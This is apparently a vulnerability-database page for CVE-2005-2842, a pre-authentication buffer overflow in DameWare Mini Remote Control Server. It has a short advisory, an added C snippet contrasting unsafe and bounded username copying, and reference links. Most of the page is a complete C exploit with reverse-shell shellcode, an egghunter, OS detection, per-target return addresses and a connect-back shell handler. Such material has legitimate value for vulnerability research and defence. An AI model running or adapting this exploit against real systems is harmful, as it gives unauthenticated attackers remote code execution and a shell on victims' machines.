DameWare Mini Remote Control Server dwrcs.exe Buffer Overflow Vulnerability

Vulnerability ID: 1109046
Vulnerability type: Buffer overflow
Published: 2005-08-31
Updated: 2005-10-20
CVE ID: CVE-2005-2842
CNNVD ID: CNNVD-200509-091
Platform: Windows
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/1190
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-091
|Vulnerability details
Mini Remote Control is a remote control system for 32-bit Windows operating systems that allows administrators to control machines on a LAN or WAN remotely. DameWare Mini Remote Control Server contains a buffer overflow vulnerability; an attacker who successfully exploits it can execute arbitrary code remotely. The cause is an insecure call to lstrcpyA when the username is checked. An unauthenticated remote attacker can exploit the vulnerability by sending a specially crafted packet to the default listening port of DameWare Remote Control Server, 6129/TCP.
|Vulnerability exploit (EXP)
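The root cause described above is an unbounded copy of a client-supplied username into a fixed-size buffer. The following is an added illustration, not code from the advisory, the exploit or DameWare: it models that pattern in portable C with strcpy standing in for the Win32 lstrcpyA, and places a bounded, length-checked replacement beside it. The field size USERNAME_MAX is a constructed value; the real size inside dwrcs.exe is not given on this page.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Constructed size for the fixed username field; the real size inside
 * dwrcs.exe is not given in the advisory. */
#define USERNAME_MAX 32

/* The vulnerable pattern, for contrast. strcpy stands in for the Win32
 * lstrcpyA the advisory names: both copy up to the NUL terminator with no
 * regard for the destination size, so a client-supplied name longer than
 * USERNAME_MAX overwrites whatever follows the buffer on the stack. */
void unsafe_copy_username(char dst[USERNAME_MAX], const char *name)
{
    strcpy(dst, name);                 /* unbounded copy: the root cause */
}

/* Hardened replacement: measure the name against the destination first,
 * reject anything that does not fit together with its terminator, and
 * leave dst well-defined (empty) on rejection. Returns true on success. */
bool copy_username(char dst[USERNAME_MAX], const char *name)
{
    size_t n = 0;
    while (n < USERNAME_MAX && name[n] != '\0')   /* bounded scan */
        n++;
    if (n >= USERNAME_MAX) {           /* too long, or no NUL within range */
        dst[0] = '\0';
        return false;
    }
    memcpy(dst, name, n + 1);          /* n characters plus the NUL */
    return true;
}

/* Mirrors the discovery story in the exploit header: a short name is
 * accepted, a pasted blob of text is refused instead of crashing. */
int main(void)
{
    char field[USERNAME_MAX];
    char huge[600];
    memset(huge, 'A', sizeof(huge) - 1);    /* constructed over-long name */
    huge[sizeof(huge) - 1] = '\0';

    unsafe_copy_username(field, "admin");  /* safe only because input is short */
    printf("unsafe copy of short name: %s\n", field);
    printf("hardened, short name accepted: %d\n", copy_username(field, "admin"));
    printf("hardened, 599-byte name rejected: %d\n", !copy_username(field, huge));
    return 0;
}
```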
/************************************************************************************************
*                            _                   ______
*                           (_)___  ____  ____  / ____/
*                          / / __ / __ / __ /___ 
*                         / / /_/ / / / / /_/ /___/ /
*                      __/ / .___/_/ /_/____/_____/
*                     /___/_/======================
*************************************************************************************************
*
*                                       DameWare Mini Remote Control Client Agent Service
*                                               Another Pre-Authentication Buffer Overflow
*                                                                By Jackson Pollocks No5
*                                                                         www.jpno5.com
*
*
*       Summary
*               +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
*               DameWare Mini Remote Control is "A lightweight remote control intended primarily
*               for administrators and help desks for quick and easy deployment without
*               external dependencies and machine reboot.
*
*               Developed specifically for the 32-bit Windows environment (Windows 95/98/Me/NT/2000/XP),
*               DameWare Mini Remote Control is capable of using the Windows challenge/response authentication
*               and is able to be run as both an application and a service.
*
*               Some additional features include View Only, Cursor control, Remote Clipboard, Performance Settings,
*               Inactivity control, TCP only, Service Installation and Ping."
*
*               A buffer overflow vulnerability can be exploited remotely by an unauthenticated attacker
*               who can access the DameWare Mini Remote Control Server.
*
*               By default (DameWare Remote Control Server) DWRCS listens on port 6129 TCP.
*               An attacker can construct a specially crafted packet and exploit this vulnerability.
*               The vulnerability is caused by insecure calls to the lstrcpyA function when checking the username.
*
*
*       Severity:   Critical
*
*       Impact:         Code Execution
*
*       Local:          Yes
*
*       Remote:         Yes
*
*       Patch:          Download version 4.9.0 or later and install over your existing installation.
*                               You can download the latest version of your DameWare Development Product at
*                               http://www.dameware.com/download
*
*       Details:        Affected versions will be any version above 4.0 and prior to 4.9
*                               of the Mini Remote Client Agent Service (dwrcs.exe).
*
*       Discovery:  I discovered this while using the DameWare Mini Remote Control client.
*                               I accidentally pasted in a large string of text instead of my username.
*                               Clicking connect led to a remote crash of the application server.
*
*       Credits:        Can't really remember who's shellcode i used, more than likely it was
*                               written by Brett Moore.
*
*                               The egghunter was written by MMiller(skape). {Which kicks ass btw}
*
*                               Thanks to spoonm for tracking that NtAccessCheckAndAuditAlarm
*                               universal syscall down.
*
*                               Some creds to Adik as well, I did code my own exploit but it had none
*                               of that fancy shit like OS and SP detection. So basically I just modded
*                               the payload from the old dameware exploit(ver 3.72).
*
*                               A little cred to me as well, after all I did put all them guys' great
*                               work together to make something decent :)
*
************************************************************************************/

#include <stdio.h>
#include <string.h>
#include <winsock.h>

#pragma comment(lib,"ws2_32")

#define ACCEPT_TIMEOUT  25
#define RECVTIMEOUT             15

#define UNKNOWN         0
#define WIN2K           1
#define WINXP           2
#define WIN2K3          3
#define WINNT           4

               unsigned char rshell[] = {
       "x41x42x41x42x41x42x41x42x90x90x90x90x90x90x90x90"// For The Egghunter
       "x90xFCx6AxEBx52xE8xF9xFFxFFxFFx60x8Bx6Cx24x24x8B"// Reverse Shell
       "x45x3Cx8Bx7Cx05x78x01xEFx83xC7x01x8Bx4Fx17x8Bx5F"
       "x1Fx01xEBxE3x30x49x8Bx34x8Bx01xEEx31xC0x99xACx84"
       "xC0x74x07xC1xCAx0Dx01xC2xEBxF4x3Bx54x24x28x75xE3"
       "x8Bx5Fx23x01xEBx66x8Bx0Cx4Bx8Bx5Fx1Bx01xEBx03x2C"
       "x8Bx89x6Cx24x1Cx61xC3x31xC0x64x8Bx40x30x8Bx40x0C"
       "x8Bx70x1CxADx8Bx40x08x5Ex68x8Ex4Ex0ExECx50xFFxD6"
       "x31xDBx66x53x66x68x33x32x68x77x73x32x5Fx54xFFxD0"
       "x68xCBxEDxFCx3Bx50xFFxD6x5Fx89xE5x66x81xEDx08x02"
       "x55x6Ax02xFFxD0x68xD9x09xF5xADx57xFFxD6x53x53x53"
       "x53x43x53x43x53xFFxD0x68x90x90x90x90x66x68x90x90"
       "x66x53x89xE1x95x68xECxF9xAAx60x57xFFxD6x6Ax10x51"
       "x55xFFxD0x66x6Ax64x66x68x63x6Dx6Ax50x59x29xCCx89"
       "xE7x6Ax44x89xE2x31xC0xF3xAAx95x89xFDxFEx42x2DxFE"
       "x42x2Cx8Dx7Ax38xABxABxABx68x72xFExB3x16xFFx75x28"
       "xFFxD6x5Bx57x52x51x51x51x6Ax01x51x51x55x51xFFxD0"
       "x68xADxD9x05xCEx53xFFxD6x6AxFFxFFx37xFFxD0x68xE7"
       "x79xC6x79xFFx75x04xFFxD6xFFx77xFCxFFxD0x68xEFxCE"
       "xE0x60x53xFFxD6xFFxD0"
       };

               unsigned char buff[40] = {
       "x30x11x00x00x00x00x00x00xC3xF5x28x5Cx8FxC2x0Dx40"// OS Detection
       "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
       "x00x00x00x00x01x00x00x00"
       };

               unsigned char fpay[] = {
       "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"// Egghunter
       "xefxb8x41x42x41x42x8bxfaxafx75xeaxafx75xe7xffxe7"
       "xccxccxccxccxccxccxccxccxccxccxccxccxccxccxccxcc"
};


long ip(char *hostname);
void shell (int sock);

int check(char *host,unsigned short tport, unsigned int *sp);

struct timeval tv;
fd_set fds;
char buff1[5000]="";

struct spl{
       unsigned long eip; char off[20];
};

struct{
       char type[10]; struct spl sp[7];
}

target_os[]={{  //Could proberly be doing with some better offsets
       "UNKNOWN"  ,{{ 0x00000000,"unknown.dll"  },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll"  },{ 0x00000000,"unknown.dll"  },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll"  }}},{
       "WIN 2000" ,{{ 0x750362c3,"ws2_32.dll"   },{ 0x75035173,"ws2_32.dll"  },{ 0x7C2FA0F7,"ws2_32.dll"  },{ 0x7C2FA0F7,"advapi32.dll" },{ 0x7C2FA0F7,"advapi32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll"  }}},{
       "WIN XP"   ,{{ 0x71ab7bfb,"kernel32.dll" },{ 0x71ab7bfb,"ws2_32.dll"  },{ 0x7C941EED,"ws2_32.dll"  },{ 0x00000000,"unknown.dll"  },{ 0x00000000,"unknown.dll"  },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll"  }}},{
       "WIN 2003" ,{{ 0x77E216B8,"advapi32.dll" },{ 0x77FD1F89,"ntdll.dll"   },{ 0x77E216B8,"ntdll.dll"   },{ 0x77E216B8,"advapi32.dll" },{ 0x00000000,"unknown.dll"  },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll"  }}},{
       "WIN NT4"  ,{{ 0x77777777,"unknown.dll"  },{ 0x77777776,"unknown.dll" },{ 0x77777775,"unknown.dll" },{ 0x77f326c6,"kernel32.dll" },{ 0x77777773,"unknown.dll"  },{ 0x77777772,"unknown.dll" },{ 0x77f32836,"kernel32.dll" }}}
};

int main(int argc,char *argv[])
{
               WSADATA wsaData;
               struct sockaddr_in targetTCP, localTCP, inAccTCP;
               int sockTCP,s,localSockTCP,accSockTCP, acsz,switchon;

               unsigned char packet[24135]="";
               unsigned short lport, tport;
               unsigned long lip, tip;
               unsigned int ser_p=0;
               int ver=0;

       printf("nn        ====== D4m3w4r3 eXpLo1t, By jpno5 ======n");
       printf("        ======    http://www.jpno5.com    ======nn");
       if(argc < 5){ printf("[+] %s Target_Ip Target_Port Return_Ip Return_Portnn",argv[0]);return 1;}

       WSAStartup(0x0202, &wsaData);

       tip=ip(argv[1]);
       tport = atoi(argv[2]);
       lip=inet_addr(argv[3])^(long)0x00000000;
       lport=htons(atoi(argv[4]))^(short)0x0000;

       memcpy(&rshell[184], &lip, 4);
       memcpy(&rshell[190], &lport, 2);

       memset(&targetTCP, 0, sizeof(targetTCP));memset(&localTCP, 0, sizeof(localTCP));

       targetTCP.sin_family = AF_INET;
       targetTCP.sin_addr.s_addr = tip;
       targetTCP.sin_port = htons(tport);

       localTCP.sin_family = AF_INET;
       localTCP.sin_addr.s_addr = INADDR_ANY;
       localTCP.sin_port = htons((unsigned short)atoi(argv[4]));

       if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)     {
               printf("ttt[ FAILED ]n");
               WSACleanup();
               return 1;
       }
       if ((localSockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){
               printf("ttt[ FAILED ]n");
               WSACleanup();
               return 1;
       }

       printf("[#] Listening For Shell On: %s...",argv[4]);

       if(bind(localSockTCP,(struct sockaddr *)&localTCP,sizeof(localTCP)) !=0){
               printf("ttn Binding To Port: %s Failed! Make Sure It Aint In Use Arleadyn",argv[4]);
               WSACleanup();
               return 1;
       }

       if(listen(localSockTCP,1) != 0){
               printf("ttt[ FAILED ]nFailed to listen on port: %s!n",argv[4]);
               WSACleanup();
               return 1;
       }

       ver = check(argv[1],(unsigned short)atoi(argv[2]),&ser_p);

       printf("n[*] Target: %s SP: %d...",target_os[ver].type,ser_p);

       memcpy(packet,"x10x27",2);
       memcpy(packet+0xc4+9,rshell,strlen(rshell));
       *(unsigned long*)&packet[516] = target_os[ver].sp[ser_p].eip;
       memcpy(packet+520,fpay,strlen(fpay));

       if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){
               printf("n[x] Connection to host failed!n");
               WSACleanup();
               exit(1);
       }

       switchon=1;
       ioctlsocket(sockTCP,FIONBIO,&switchon);
       tv.tv_sec = RECVTIMEOUT;
       tv.tv_usec = 0;FD_ZERO(&fds);
       FD_SET(sockTCP,&fds);

       if((select(1,&fds,0,0,&tv))>0){
               recv(sockTCP, buff1, sizeof(buff1),0);}else{
                       printf("[x] Timeout! Failed to recv packet.n");
                       exit(1);
               }

       memset(buff1,0,sizeof(buff1));
       switchon=0;ioctlsocket(sockTCP,FIONBIO,&switchon);

       if (send(sockTCP, buff, sizeof(buff),0) == -1){
               printf("[x] Failed to inject packet!n");
               WSACleanup();
               return 1;
       }

       switchon=1;
       ioctlsocket(sockTCP,FIONBIO,&switchon);
       tv.tv_sec = RECVTIMEOUT;tv.tv_usec = 0;
       FD_ZERO(&fds);FD_SET(sockTCP,&fds);

       if((select(sockTCP+1,&fds,0,0,&tv))>0){
               recv(sockTCP, buff1, sizeof(buff1),0);switchon=0;
       ioctlsocket(sockTCP,FIONBIO,&switchon);

       if (send(sockTCP, packet, sizeof(packet),0) == -1){
               printf("[x] Failed to inject packet! n");
               WSACleanup();
               return 1;
       }
       }else{
               printf("n[x] Timedout! Failed to receive packet!n");
               WSACleanup();
               return 1;
       }

       closesocket(sockTCP);

       printf("n[*] Waiting for Shell...r");

       switchon=1;
       ioctlsocket(localSockTCP,FIONBIO,&switchon);
       tv.tv_sec = ACCEPT_TIMEOUT;
       tv.tv_usec = 0;FD_ZERO(&fds);
       FD_SET(localSockTCP,&fds);

       if((select(1,&fds,0,0,&tv))>0){
               acsz = sizeof(inAccTCP);
               accSockTCP = accept(localSockTCP,(struct sockaddr *)&inAccTCP, &acsz);
               printf("n[*] Enjoy...nn");
               shell(accSockTCP);
       }else{
               printf("n[x] Exploit Failed! Proberly Patchedn");
               WSACleanup();
       }
       return 0;
}

long ip(char *hostname) {
       struct hostent *he;
       long ipaddr;

       if ((ipaddr = inet_addr(hostname)) < 0) {
       if ((he = gethostbyname(hostname)) == NULL) {
               printf("[x] Failed to resolve host: %s!nn",hostname);
               WSACleanup();exit(1);
       }

       memcpy(&ipaddr, he->h_addr, he->h_length);}return ipaddr;}

 void shell (int sock){
 struct timeval tv;int length;
 unsigned long o[2];
 char buffer[1000];

 tv.tv_sec = 1;tv.tv_usec = 0;
 while (1){ o[0] = 1;o[1] = sock;
       length = select (0, (fd_set *)&o, NULL, NULL, &tv);
       if(length == 1){length = recv (sock, buffer, sizeof (buffer), 0);
       if (length <= 0) {
               printf ("[x] Connection closed.n");
               WSACleanup();
               return;
       }
       length = write (1, buffer, length);
       if (length <= 0) {
               printf ("[x] Connection closed.n");
               WSACleanup();return;}}else{length = read (0, buffer, sizeof (buffer));
       if (length <= 0) {
               printf ("[x] Connection closed.n");
               WSACleanup();return;}length = send(sock, buffer, length, 0);
       if (length <= 0) {
               printf ("[x] Connection closed.n");
               WSACleanup();
               return;
               }}}}

int check(char *host,unsigned short tport, unsigned int *sp){

       int sockTCP,switchon;
       struct sockaddr_in targetTCP;
       struct timeval tv;fd_set fds;

       memset(&targetTCP,0,sizeof(targetTCP));
       targetTCP.sin_family = AF_INET;targetTCP.sin_addr.s_addr = inet_addr(host);targetTCP.sin_port = htons(tport);

       if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){
               printf("ttt[ FAILED ]n Socket not initialized! Exiting...n");
               WSACleanup();
               return 1;
       }

       if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){
               printf("[x] Connection to host failed!n");
               WSACleanup();
               exit(1);
       }

       switchon=1;
       ioctlsocket(sockTCP,FIONBIO,&switchon);
       tv.tv_sec = RECVTIMEOUT;
       tv.tv_usec = 0;
       FD_ZERO(&fds);FD_SET(sockTCP,&fds);

       if((select(1,&fds,0,0,&tv))>0){
               recv(sockTCP, buff1, sizeof(buff1),0);}
       else{
               printf("[x]Timedout! Doesn't Look Like A Dameware Servern");
               exit(1);
       }

       switchon=0;
       ioctlsocket(sockTCP,FIONBIO,&switchon);

       if (send(sockTCP, buff, sizeof(buff),0) == -1){
               printf("[x] Failedn");
               WSACleanup();
               return 1;
       }

       switchon=1;
       ioctlsocket(sockTCP,FIONBIO,&switchon);

       tv.tv_sec = RECVTIMEOUT;
       tv.tv_usec = 0;FD_ZERO(&fds);
       FD_SET(sockTCP,&fds);

       if((select(sockTCP+1,&fds,0,0,&tv))>0){
               recv(sockTCP, buff1, sizeof(buff1),0);
               closesocket(sockTCP);
       } else {
               printf("n[x] Timedout!n");
               WSACleanup();
               return 1;
       }

       if(buff1[8]==5 && buff1[12]==0){*sp = atoi(&buff1[37]);
       closesocket(sockTCP);
       return WIN2K;
       }  else if(buff1[8]==5 && buff1[12]==1){*sp = atoi(&buff1[37]);
       closesocket(sockTCP);
       return WINXP;
       }  else if(buff1[8]==5 && buff1[12]==2){*sp = atoi(&buff1[37]);
       closesocket(sockTCP);
       return WIN2K3;
       } else if(buff1[8]==4){*sp = atoi(&buff1[37]);
       closesocket(sockTCP);
       return WINNT;
       } else{
               closesocket(sockTCP);
       return UNKNOWN;
       }
}

// milw0rm.com [2005-08-31]
|References

Source: US-CERT
Name: VU#170905
Link: http://www.kb.cert.org/vuls/id/170905
Source: BID
Name: 14707
Link: http://www.securityfocus.com/bid/14707
Source: MISC
Link: http://www.jpno5.com/Releases/Public/Exploits/Dameware%20Mini%20Remote%20Control%20Exploit/dameware.txt
Source: VUPEN
Name: ADV-2005-1596
Link: http://www.frsirt.com/english/advisories/2005/1596
Source: SECTRACK
Name: 1014830
Link: http://securitytracker.com/id?1014830
Source: FULLDISC
Name: 20050831 Dameware critical hole
Link: http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html
Source: SECUNIA
Name: 16655
Link: http://secunia.com/advisories/16655
